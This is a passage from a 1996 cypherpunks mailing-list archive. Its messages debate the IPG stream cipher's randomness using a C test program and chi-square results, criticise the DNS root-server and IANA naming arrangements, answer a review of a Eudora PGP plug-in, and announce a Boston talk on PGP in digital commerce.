> 			argcnt++;
> 		}
> 	}
> 	if (argc > argcnt - 1 ) {
> 		n = atoi(argv[argcnt]);
> 		fprintf(stderr,"Generating %d values\n",n);
> 	}
> 	else {
> 		n = 2000;
> 	}
> 
> 	/* seed tables: */
> 	fprintf(stderr,"Seeding:  A");  fflush(stderr);
> 	init_table(A,0,65535);
> 	fprintf(stderr," B");  fflush(stderr);
> 	init_table(B,0,12227);
> 	fprintf(stderr," C");  fflush(stderr);
> 	init_table(C,16384,20361);
> 	fprintf(stderr,"\n");  fflush(stderr);
> 
> 	/* generate n values: */
> 	/* jv is "random" (where's it seeded from?) */
> 	jv = (uint16)(getrand() % 53);
> 	for(; n > 0; n--) {
> 
> 		/* count limits the number of traverses to 53^2 so we don't get stuck */
> 		/* 2809 is actually too low per Chudov:
> 		** "For example, if ALL B == 1, A == 16385, and C == 20361, the
> 		**  loop may need (20361-16385) passes to get to the < 16384 value."
> 		*/
> 		for(count = 0; count < 2809; count++) {
> 			jv++;
> 			if (jv == 53) jv = 0;
> 			A[jv] = (A[jv] + B[jv]) % C[jv];
> 			if (A[jv] < 16384) break;
> 		}
> 		if (count == 2809) fprintf(stderr,"Oops.\n");
> 		else {
> 			if (!diehard) {
> 				write(1,(unsigned char *)&A[jv],sizeof(uint16));
> 			}
> 			else {
> 				/* print output in DIEHARD required format:
> 				** actually since we have 16-bit ints and DIEHARD
> 				** wants 32-bit ints, we print 20 per line instead of 10 */
> 				if (nelem++ > 19) {printf("\n"); nelem = 0;}
> 				printf("%4.4x",(unsigned int)A[jv]);
> 			}
> 		}
> 	}
> }
> -- 
> Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
> PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Wed, 11 Dec 1996 01:55:46 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: IPG algorithim
In-Reply-To: <199612010026.SAA15878@manifold.algebra.com>
Message-ID: <Pine.BSI.3.95.961211035445.11832K-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



Read the others, they are trying but like Dale Thorn said, they cannot do
it in a few minutes.

Thanks, 

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mf@MediaFilter.org (MediaFilter)
Date: Wed, 11 Dec 1996 03:22:38 -0800 (PST)
To: eon@black.hole
Subject: Much Ado About Names
Message-ID: <1361845458-1212940@MediaFilter.org>
MIME-Version: 1.0
Content-Type: text/plain


Much Ado About Names

The internet naming system, known as the "domain name system"
has made the transition to the private sphere from the once
taxpayer supported public sphere, under guardianship of the
National Science Foundation.  The current operator of the
name registry, the InterNIC (internet network information center),
is Network Solutions, Inc.who now enjoys a highly profitable monopoly.

Network Solutions, Inc., who is owned by Scientific Applications
International Corporation (SAIC) began charging for the once gratis
name registrations in September 1995 as the internet was well on its
transition to a commercial marketplace.  Their registration fee of
$100 for the first 2 years of service has richly lined NSI's coffers
as the number of registrations reached around 50,000 per month during
1996.  During this interval, the limitations of the current naming
paradigm became obvious as companies discovered that they had to race,
or in some cases litigate, to secure their internet identities,
"their-name.com"--only to discover that it was already assigned.
Some, like golf protege, Tiger Woods, became victims of name
speculators who registered famous names in hopes of selling them
back to their rightful owners.  The holders of "tigerwoods.com"
were said to be willing to give the REAL Tiger Woods his name back
only if they could do his website!

Part of the problem lies not just in human greed, but in the
limited number of the so-called "top level domains" administered
by the InterNIC, "com." "edu." "org." "net." and "gov.".
Under this system, which has its roots in the US Dept. of Defense
bureaucracy, was designed to identify the purpose or geographic
location of computers on the internet.

The "com." domain was the division given to commercial
network addresses, who at the time the system was established, were
a minority of networks on the interet--the majority being "mil."
"gov." "edu." and "net.".  Now that the number of commercial networks
has grown beyond any scale ever imagined by the architects of the internet,
the "com." domain has proven to have reached its limits.

Users have been frustrated by the limitations,
speculation, and buraucracy associated with registering an address on
the internet with the InterNIC/NSI/SAIC monopoly.  Pressure on the
committee that assigns unique parameters on the internet, the Internet
Assigned Numbers Authority (IANA) has pushed IANA to for an ad-hoc
committee to decide how to deal with the domain name "shortages".

IANA has put forth a controversial plan to license comapnies who
wish to compete in the market for domain name service--in a market-
place which was recently deregulated, and in which IANA has no
congressional authority to impose regulation, or levy taxes
--or as they frame it, collect license fees: a $1000 non-refundable
application fee, a $2000 annual license fee, plus 2% of comapany
revenues.  IANA claims that these funds will be spent on maintaining
the rootservers--the computers which hold the central name dabase.
The computers holding the domain name database are currently run by
an inner circle, most of whom are members of the IANA. The server at
University of Southern California, USC, for example, is run by
Mr. John Postel, the head of the IANA.


The locations and operators of the current rootservers include:


Defense Research and Engineering Network (DREN-DOM)
   Department of Defense High Performance
   Computing Modernization Working Group,
   Networking Subcommittee
   c/o Director
   U.S. Army Research Laboratory
   Aberdeen Proving Ground, MD 21005-5067

   Domain Name: DREN.NET

   Administrative Contact:
      Reschly, Robert J., Jr.  (RJR3)  reschly@ARL.ARMY.MIL
      (410) 278-6808/8676 (DSN) 298-6808/8676
   Technical Contact, Zone Contact:
      Fielding, James L.  (JLF)  jamesf@ARL.MIL

 University of Maryland (UMD-DOM)
   Academic Information Technology Services
   Network Operations Center
   Bldg 224, Room 1301
   College Park, MD 20742

   Domain Name: UMD.EDU

   Administrative Contact, Technical Contact, Zone Contact:
      Sneeringer, Gerry  (GS307)  sneeri@NI.UMD.EDU
      (301) 405-2996

Network Solutions, Inc. (INTERNIC-DOM)
   505 Huntmar Park Drive
   Herndon, VA 22070

   Domain Name: INTERNIC.NET

   Administrative Contact:
      Network Solutions, Inc.  (HOSTMASTER)  hostmaster@INTERNIC.NET
      (703) 742-4777 (FAX) (703) 742-4811
   Technical Contact, Zone Contact, Billing Contact:
      Kosters, Mark A.  (MAK21)  markk@NETSOL.COM
      (703) 742-4795 (FAX) (703) 742-4811

 Los Nettos (LN-DOM)
   USC Information Sciences Institute  4676 Admiralty Way
   Marina del Rey, CA 90292-6695
   US

   Domain Name: LN.NET

   Administrative Contact:
      Postel, Jon  (JBP)  POSTEL@ISI.EDU  <-----Mr. Postel is head of IANA******
      (310) 822-1511
   Technical Contact, Zone Contact:
      Woolf, Suzanne  (SW145)  WOOLF@ISI.EDU
      (310) 822-1511
   Billing Contact:
      Anderson, Celeste  (CA534)  celeste@ISI.EDU
      (310) 822-1511

 University of Maryland (UMD-DOM)
   Academic Information Technology Services
   Network Operations Center
   Bldg 224, Room 1301
   College Park, MD 20742

   Domain Name: UMD.EDU

   Administrative Contact, Technical Contact, Zone Contact:
      Sneeringer, Gerry  (GS307)  sneeri@NI.UMD.EDU
      (301) 405-2996

U.S. Sprint/NSF International Connectivity Project (ICP-DOM)
   VAHRNA0401
   13221 Woodland Park Road
   Herndon, VA 22071

   Domain Name: ICP.NET

   Administrative Contact:
      Kurt, Gastrock  (GK368)  gastrock@SPRINT.NET
      1-800-230-5108
   Technical Contact:
      Kilmer, Hank  (HK468)  hank@SPRINT.NET
      1-800-230-5108 (FAX) 703-904-2292
   Zone Contact, Alternate Contact:
      Sprint Network Info. & Support Center  (SPRINT-NOC)  noc@sprintlink.net
      (800) 669-8303
   Billing Contact:
      Goel, Vab  (VAB-US)  vgoel@SPRINT.NET
      7039042635

NORDUnet (NORDU-DOM)
   c/o SUNET-KTH
   S-100 44 Stockholm
   SWEDEN

   Domain Name: NORDU.NET

   Administrative Contact:
      Eriksen, Bjorn [System Manager]  (BE10)  BER@SUNIC.SUNET.SE
      +46 8 790 60 00
   Technical Contact, Zone Contact:
      Liman, Lars-Johan  (LL846)  LIMAN@SUNET.SE
      +46 8 790 65 60 (FAX) +46 8 24 11 79

Vixie Enterprises (VIX-DOM)
   Star Route Box 159A
   Woodside, CA 94062

   Domain Name: VIX.COM

   Administrative Contact, Technical Contact, Zone Contact, Billing Contact:
      Vixie, Paul  (PV15)  paul@VIX.COM
      (415) 747-0204

DOD Network Information Center (NIPR-DOM)
   Government Systems, Inc.
   Attn: NSI (Hostmaster)
   14200 Park Meadow Dr., Suite 200
   Chantilly, VA 20151


   Domain Name: NIPR.MIL

   Administrative Contact, Technical Contact:
      Government Systems, Inc.  (HOSTMASTER)
      703-802-4535 (FAX)703-802-8376
      HOSTMASTER@NIC.DDN.MIL


IANA's plan, which has no congressional mandate,
is imposing regulation on a deregulated market, subsidizing corporations,
and collecting double taxes on US and International companies, as evidenced
by the identities of the networks who would reap the benefits of any
fees imposed on other registries.

To add insult to injury, is to examine the profile of SAIC,
a 2 billion dollar company with strong ties to the Pentagon and the
NSA.  SAIC is an employee-owned company of 20,000 with about 450
offices around the globe.  Its current board of directors include
former National Security Agency chief Bobby Inman, Former Defense
Secretary Melvin Laird, and the former head of research and development
for the Pentagon, Donald Hicks.  Ex-CIA director Robert Gates, Secretary
of Defense William Perry and CIA Director John Deutsch have been past
board members.  Eighty-three percent of SAIC's $2 billion annual
revenue comes from government contracts, including defense, intelligence
and law enforcement contracts.  SAIC is designing new information
systems for the Pentagon, helping to automate the FBI's computerized
fingerprint identification system, and last year won a $200million
contract to provide "information support" to the IRS.
(source: John Dillon, "Networking with Spooks", CAQ magazine, winter, 1996).

Enter the free market.  Individual comapnies cropped up in
response to the command economy of artificial shortages that
had been imposed by a US-centric, militaristic bureaucracy
and created new networks of rootservers outside the "sanctioned"
servers on which all connections on the internet depend.
If your name does not appear in the "sanctioned" database
(the rootservers detailed above), your name will not be found
everywhere on the internet....only other computers who check
the "outsider" database will be able to resolve the new domain
names created by the independent companies.--and there are
already around 200 new possible names under which one can
register on these new services.  This poses a problem for
the independent upstart name registries because, although
they may have a fully functional rootserver system in place,
and a fully automated and operational registration service
in place, they are essentially frozen out of service becuase
the de-facto rootservers, controlled by members of IANA, decide
which entries will be in the database of the "sanctioned" rootservers.
Hence, the IANA has a vested interest in protecting their
control over the "whos-who" list of internet networks, as do
their compatriots at Network Solutions, Inc., SAIC, and the
government agencies who do business with them.

For an example of a fully functional,
independent name registry, please go to
http://namespace.pgpmedia.com.

For some further information on the controversy, please go to
http://www.packet.com/hotseat
this is a "realaudio" webcast between John McChesney of NPR,
Paul Garrin of name.space., and Simpson Garfinkel of WIRED magazine.

Also see,
"Rebellion Over Who Controls the Net"
by Christine Biederman and Jamie Murphy
(N.Y. Times, "Cybertimes", November 23, 1996)

"Internet Domain Names: Whose Domain is This?"
http://www.itu.ch/intreg/dns.html
by Robert Shaw,Advisor, Global Information Infrastructure
Information Services Department, International Telecommunication Union (ITU)
Geneva, Switzerland
(Presented at the workshop "Coordination and Administration of the
Internet" held at the John F. Kennedy School of Government, Harvard
University, Cambridge, Massachusetts, USA, September 9-10, 1996).

the John Dillon article "Networking with Spooks" appears in the
latest issue of CAQ, available soon at http://mediafilter.org/caq
(or http://caq.mag.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Wed, 11 Dec 1996 02:06:37 -0800 (PST)
To: Clay Olbon II <olbon@ix.netcom.com>
Subject: Re: more IPG and random numbers
In-Reply-To: <1.5.4.32.19961204142607.006a18bc@popd.ix.netcom.com>
Message-ID: <Pine.BSI.3.95.961211040151.11832M-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




I agree generally to what Clay sets out below. However, the test cannot be
run apart from the other integral parts involved. Incidentally, try
running triplet, or even greater, autocorrelation of the 200 megabytes
set out at our web site. there is absolutely no problem. As indicated in
our statistics, we have already done that.

On Wed, 4 Dec 1996, Clay Olbon II wrote:

> At 09:24 PM 12/3/96 -0800, Eric Murray wrote:
> >I did some more experiments with the IPG stream-cipher
> >algorithim and random number tests.  Since IPG claim that their
> >algorithim passes chi-square tests of randomness, I found
> >a chi-square test program.  It's written by Peter Boucher
> >and was posted to sci.crypt in '93 (<2bum8sINN98j@roche.csl.sri.com>).
> 
> Eric,
> 
> The chi-square test is fairly easy to implement.  Understanding the
> alogrithm and interpreting what the test results mean is as important as a
> proper implementation.  An excellent text that covers testing PRNGs
> (including, chi-square, KS, runs (up, down, above & below the mean), and
> autocorrelation) is Simulation Modeling & Analysis, by Law & Kelton.
> 
> >> Does the 'runs up' (or 'runs down') test with run-length equal to two
> >> get me anything over the standard chi-square test?  I left it in.
> 
> Yes.  It tests yet another aspect of "is the data truly random?"
> 
> >First I ran the output from my version of the IPG algorithim that I
> >posted a couple days ago :
> >
> >% ./boucher < ipg.out
> >Occurances:  n =  12000000, V=-8375833.71
> >Character occurances non-random
> >Successions: n =     46875, V=62287.82
> >Character successions non-random
> 
> Unless the V is a typo, there is an error in the code.  The chi-square
> statistic can never be negative.
> 
> >Then I ran output from a test RNG that's basically a loop around random():
> >
> >% ./boucher < myrandom/out
> >Occurances:  n =   3414720, V=213050.62
> >Character occurances non-random
> >Successions: n =     13338, V=1143.41
> >Character successions non-random
> 
> I did considerable testing on random() a while back.  It is actually quite
> good at producing a uniform distribution.  There were other problems however
> (notably autocorrelation in triplets).
> 
> >Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
> >PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF
> 
> I suggest you take a look at the chi-square program and check it for errors.
> Based on the above observations, I am a little suspicious of your results. 
> 
> As a side note, I tend to test PRNGs using stream lengths that are similar
> to what I will need in a real use of the generator.  I also test multiple
> seeds, because statistically, some seeds will fail.  Of course, testing
> multiple seeds has its own problems (see the bonferroni inequality) of which
> most non-statisticians are unaware.  
> 
> I have been curious for a while about developing a statistical test that
> would examine the expected number of failures of a repeated statistical
> test. Haven't had the time to look into it yet though - not enough hours in
> the day.
> *******************************************************
> Clay Olbon			    olbon@ix.netcom.com
> engineer, programmer, statistitian, etc.
> **********************************************tanstaafl
> 
> 
With Kindest regards,

Don Wood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Wed, 11 Dec 1996 02:45:00 -0800 (PST)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Ignoramus Chewed-Off on IPG algorithm
In-Reply-To: <199611301803.MAA13859@manifold.algebra.com>
Message-ID: <Pine.BSI.3.95.961211042446.5247B-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



Igor,

I greatly appreciate the fact that you are looking at the algorithm.
You have the general idea but I do not believe that you have spent
enough time with it to understand what all is going on.


For instance, be advised that all Bs and Cs are not random numbers 
at all, but rather they are randomly selected from a previously selected
set of values, so that there are no repeats and all Bs are less than the
smallest possible C, and the sum of B plus C is always < 32761.
Furthermore, either B or C, one and sometimes both, are prime numbers.

You might have an A(i) value of zero, and will have it 1 in C(i)
iterations, but you can never have a b value of 0, or a C values or zero.
Nor can any set of:

          A(JV)=A(JV)+B(JV) MOD C(JV)

generate a partial set set of the possible C values because either the B
value or the C value is prime. 


Furthermore, initial A values are chosen so that A+ Bmax + Cmax is less
than 32761.

Accordingly the circumstances that you describe cannot occur. The
randomness referred to in the As, Bs, and Cs, result from the selection
process, not from the values themselves. It goes without saying that
using random values would not work, for the reason that you mention
plus other. 

For instance, there are no repeats between any of the As, Bs, and Cs which
is one indication that they are not random. To the contrary, the pool of
numbers are selected numbers, approximately 66% prime and 33% nonprime,
which maximizes the covariance, in a LP sense, with the modulos 4096 and
256.

The selection process uses a key, generated by the user from the timing of
keystrokes, to select the which As, Bs and Cs will actually be used. I
tried to explain this in the detailed algorithm explanation. at the web
site.

 	


On Sat, 30 Nov 1996, Igor Chudov @ home wrote:

> Igor Chudov @ home wrote:
> > 
> > Hi,
> > 
> > I was sort of tired of endless talk that "IPG algorithm was not 
> > peer-reviewed, blah blah blah, so we won't even look at it, 
> > blah blah blah", and decided to look at what Don Wood writes and
> > try to see how his program actually works. 
> > 
> > Of course, I am not an expert in cryptography, and will appreciate all
> > corrections. The web page to look at is http://www.netprivacy.com/algo.html,
> > and it describes IPG algorithm in some detail.
> > 
> > First of all, the description of the algorithm is extremely unclear. I
> > understand that this may be Don Wood's writing style, but it is certainly 
> > not the most efficient style for precise communications. I suggest that
> > Don tries to rewrite his description to be more structured.
> > 
> > Second, I seriously suspect that his algorithm of "trimming" is NOT
> > going to work right. Just to remind everyone, he generates pseudo-random
> > A(JV), B(JV), C(JV) such that
> > 
> > 	16384 <  C < 20361
> > 	         B < 12227
> > 	A arbitrary (at least the web page contains no restrictions 
> > 	  on the value of A).
> > 
> > and then goes on to "trimming" -- a process that obtains a new value
> > of A that is LESS than 16384 through this algorithm: 
> > 
> >        DO
> >          JV=JV+1
> >          IF JV=53 THEN JV=0
> >          A(JV)=(A(JV)+B(JV)) MOD C(JV)
> >        UNTIL A(JV)<16384
> > 
> > We shall first note that THERE ARE CASES WHEN THIS ALGORITHM WILL NEVER
> > STOP! For example, if all A values are _initially_ 16385 and all C
> > values are 16386 and all B's are 0, it is obvious that the pseudocode 
> > above will be stuck in endless loop.
> > 
> > No good for IPG algorithm.
> > 
> > in fact, if only some triplets of A, B, and C have B == 0 and 16384 < A < C,
> > these triplets will always be ignored (skipped) by his trimming process.
> 
> Note also that if B(K) == 1, his algorithm will need to make C passes
> through the loop for JV == k, in order to generate a new value of A(JV).
> 
> This is very inefficient and results in a bias for triplets with high
> Bs -- because they will generate good A(JV) more frequently.
> 
> 	- Igor.
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 10 Dec 1996 22:36:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Are accountants smart or stupid?
Message-ID: <199612110636.HAA25808@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anonymous@null.net>
Date: Wed, 11 Dec 1996 04:43:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: I thought this was a technical list.
Message-ID: <32AEAE92.586F@null.net>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Dec 1996 05:57:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The product formerly known as VGP
In-Reply-To: <199612110510.XAA18700@manifold.algebra.com>
Message-ID: <BowRyD120w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
[VGP]
> To Mark Rosen: name it Cryptographic Utility for Network Transmissions.

This reminds me how when I was a student at CUNY, I computerized many
things, including the distribution of the bulletin with seminar announcements.
One day I misspelled CUNY by pressing a letter next to Y instead of Y.
(The spell checker didn't complain.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damon Gallaty <dgal@cad.gatech.edu>
Date: Wed, 11 Dec 1996 05:03:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Review of the EPP plug-in 0.2 for Eudora
Message-ID: <2.2.32.19961211130202.0068f0bc@gypsy.cad.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 05:48 AM 12/10/96 -0800, Alan Olsen <alan@ctrl-alt-del.com> wrote:

>[Note: this is CCed to the developer for two reasons.  First, I wanted him
>to know of the review.  Second, I have another two bugs at the bottom that
>I have not reported.]
>

Hi...I'm the developer. I'd like to respond to these items that Alan Olsen
listed so that everyone knows what the heck I'm doing with the Eudora/PGP
Plug-In, a.k.a EPPI.

[snippet about what EPPI is deleted]

>The functions provided are:
>
>-- Clearsign Message
>-- Decrypt Message
>-- Encrypt Message
>-- Verify Signature
>-- Add Key
>-- Paste (Insert) Key
>
>These appear under the Edit menu in the plug-ins submenu.  (It would be
>nice for these to be in their own seperate menu, but that may be beyond the
>scope of the plug-in developers kit.)
>

Unfortunately, the plug-in developers kit, called the Eudora Messaging
System API (EMS API), is very limited, and only provides the functions
necessary to get the incoming or currently-displayed mail message, and to
paste the results of the plug-in into said message. It gives _no_ control
over the Eudora menus. In fact, you can't even activate any arbitrary menu
or function of Eudora, nor can you read any information besides what is
passed to you by the various functions which call your plug-in.

Many of the problems below have been called to my attention. I'll note those
that have, and add to my list those that haven't. I'll also explain what I'm
doing to correct the problems. If anyone has a better suggestion of fixing a
specific problem, please let me know.

>
>These are the problems/bugs I have found so far:
>
>--  If you do not define a default ID in the PGP config.txt, it will take
>the last ID generated on the secret key ring.  (This is a common problem.
>This is not the only app that has it.)
>

Already known. I'll have a field to specify default ID, with an entry for
the hex key ID in case there are more than one of the same user ID.

>--  The program does not word wrap before sending the message to get
>signed.  This breaks the signature when Eudora word wraps it opon sending
>the message.  (Another common problem. I remember a bunch of apps fixing
>this one at one time a few months ago...)
>

Already known. I'll perform the word-wrap in the plug-in.

>--  If you decrypt a message, the mail headers are destroyed.  (I just
>discovered this one last night.  It makes replying a bit of a challenge...)
>

Already known. I'll change the way the plug-in replaces text by only
replacing the text between the PGP BEGIN and END headers.

>-- The plug-in does not deal with "personalities".  (This is not a bug, but
>something that would be *REAL* helpful.  Now if you could get personalities
>that connected to nym servers.)
>

There's not much I can do about this. I have no way of knowing in the
plug-in that a user has switched personalities, so there is no way to notify
the plug-in to use a different configuration. I could, however, add
personalities to the plug-in, which would at least let the user select
different configurations in it to match the current personality being used.
Comments?

>All in all, this is a useful plug-in.  It has a few rough spots, but that
>is to be expected.  (This is a 0.2 release.)
>

Thank you. Yes, I knew it was going to be rough at first, hence the version
numbering of 0.x. I'll get to 1.0 when I feel it's truly a polished Eudora
plug-in worthy of paying for (though I plan to keep it freeware).

>
>BTW, this is the original information as to where to get the plug-in.  How
>much of this is current, i am not certain...  (The mailing list was broken
>according to Lucky Green.)
>

Sadly, my account was unexpectedly yanked out from under me, so that
information is wrong. However, thanks to some generous folks who responded
to my plight, I have some temporary locations set up, until I can find a
permanent home. Here is the updated information:

Download version 0.20 from the Web:

   * http://www.geocities.com/Heartland/5065/epp16v02.zip
     (for 16-bit version of Eudora 3.0 for Windows 3.1)
   * http://www.geocities.com/Heartland/5065/epp32v02.zip
     (for 32-bit version of Eudora 3.0 for Windows NT/95)

If you don't have Web access, but have FTP access, try the following sites.
Note that if the version you are trying to get was released today or just a
few days ago, it may not have shown up at the sites below yet, so give it a
few days:

papa.indstate.edu: /pub/winsock-l/mail/epp16v02.zip
                   /pub/winsock-l/Windows95/mail/epp32v02.zip
                   /pub/winsock-l/WindowsNT/mail/epp32v02.zip

ftp.winsite.com:   /pub/pc/win3/winsock/epp16v02.zip
                   /pub/pc/win95/winsock/epp32v02.zip

If you want to be automatically notified of new versions, send e-mail to
EPPINEWS@professional.org with the following message body:

join
stop

You will not be able to post to this list. It is merely a convenient way to
receive notification of new updates to EPPI.

Send comments to: dgal@cad.gatech.edu

I have noticed that GeoCities has had some problems last week. Hopefully,
these are corrected by now. If not, try the FTP sites.
- Damon Gallaty <dgal@cad.gatech.edu>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Dec 1996 05:55:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Java DES breaker?
In-Reply-To: <v03007802aed40c1165e1@[204.31.235.150]>
Message-ID: <iuwRyD122w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz <frantz@netcom.com> writes:
> I have a client who needs strong crypto routines in Java.  (They want
> maintain the privacy of their customer's data when stored on the customer's
> disk.)  They need the platform independence that Java provides.  I would
> appreciate pointers to implementations.  (BTW - I already know about the
> Systemics routines.)

I think it would make much more sense to implement a CPU-intensive problem
like DES in ActiveX.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Wed, 11 Dec 1996 05:07:31 -0800 (PST)
To: DWSKI1283@aol.com
Subject: Re: take me off the list, please!!!
Message-ID: <3.0.32.19961211080756.00694f94@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/enriched

At 07:01 PM 12/10/96 -0500, you wrote:
:please take me off the mailing list, i cant stand the petty bickering. What a
:waste, you guys spend all your time taking potshots at each other instead of
:really relevant issues. My sincere apologies to those not involved.


If you're so damn serious about really relevant issues, how about taking the time to learn something so simple as how to get off the list.

Geez!
Cordially,

Alec                   

PGP Fingerprint:
Type bits/keyID    Date       User ID
pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Tue, 10 Dec 1996 23:11:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: RE: Java DES breaker?
Message-ID: <9612110711.AA25962@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Wed Dec 11 08:11:13 1996
> A few small bugs in this idea, at least for the masses --
> 1) This would only appeal to people who have unlimited usage
> 2) ...and don't care about not having their phone available (I know
>    they're asleep at the time)
> 3) ...and don't have an ISP that will kick them off when a timeout
>    period expires.

AND don't have a phone system that charges for local calls (like for 
example almost everyone except americans... :(


- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
Fingerprint: 33F9B4E9
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: http://www.rpini.com/crypto/crypto.html

iQEVAwUBMq5ekRFhy5sz+bTpAQHLRgf+NQY8XwrB+Fjdto+1bsr8M2vaH9GdNS9R
PjjbNitAnXrqnoyeYHq4IyC4zkfr6wYce14McRyp5ePjNrfYO0n0rTFH3XBvpFwx
usgDSeYNWrcXPuOB8WrPjHxy7OVv8kgnAp00PHImk+x9E5ppJHfSFUDzYlKProie
8CelWUb/EcKkwTJfMnH+s1S9HRPDwxiE7m2OlID1c/+ZobQr0B7BqbSnK9CIvPst
cwpzzoAUjNOiSoOIHuUO7ud/Ie03ohPDF0bF4KiKJaeRUNZjLaK7V7DgpfgWv+Zk
V2K14TLQ5gAFcFCDnLKo1qePLmZtu1F0YJcbYkQLBh7dhqQpoPtHrQ==
=Xg6k
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 11 Dec 1996 06:22:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: DCSB: Applying PGP To Digital Commerce
Message-ID: <v03007801aed46cf357df@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: rah@pop.tiac.net
Mime-Version: 1.0
Date: Wed, 11 Dec 1996 08:08:44 -0500
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Applying PGP To Digital Commerce
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----



                 The Digital Commerce Society of Boston

                              Presents
                           Rodney Thayer
                   Sable Technology Corporation

                  "Applying PGP To Digital Commerce"



                        Tuesday, January 7, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Rodney Thayer has 20 years experience in the software development business.
For the past 10 years he has been designing, implementing, deploying, and
troubleshooting networking software.  He currently is the Principal of a
consulting firm based in Newton, Massachusetts where he is involved in the
implementation of communications products for a variety of customers,
including software vendors, major end-user organizations, and several
governmental organizations both foreign and domestic.  He also writes and
lectures on the deployment, troubleshooting, and implementation of data
communications networks.


Mr. Thayer  will talk about how PGP can be used in the business world
today, for exchange of information, digitally identifying documents, and
other commerce applications.  In this presentation, we will discuss the
application of PGP, including mechanics, the cryptographic and legal
issues, and the infrastructure requirements for it's use.

The state of the art in digital message encryption is now at the point
where it has become practical to use encrypted and digitally signed
email for digital commerce.  Recently, one scheme, PGP, has emerged
from the realm of the cyberpunk as a legitimate tool for business.
Commercial products are now available that support PGP encryption in
electronic mail and for documents and digital storage.

PGP is no longer a cult tool for computer junkies and cyberpunks.  It
is a legitimate, sound cryptographic technology that can be used,
today, for digital commerce.  As an increasingly crypto-aware business
community searches for solutions, the question of how to use message
encryption tools such as PGP becomes germaine to the business community.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, January 7, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is
$27.50. This price includes lunch, room rental, and the speaker's lunch.
;-).  The Harvard Club *does* have dress code: jackets and ties for men,
and "appropriate business attire" for women.

We will attempt to record this meeting and put it on the web in RealAudio
format at some future date

We need to receive a company check, or money order, (or, if we *really*
know you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, January 4, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be
sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've
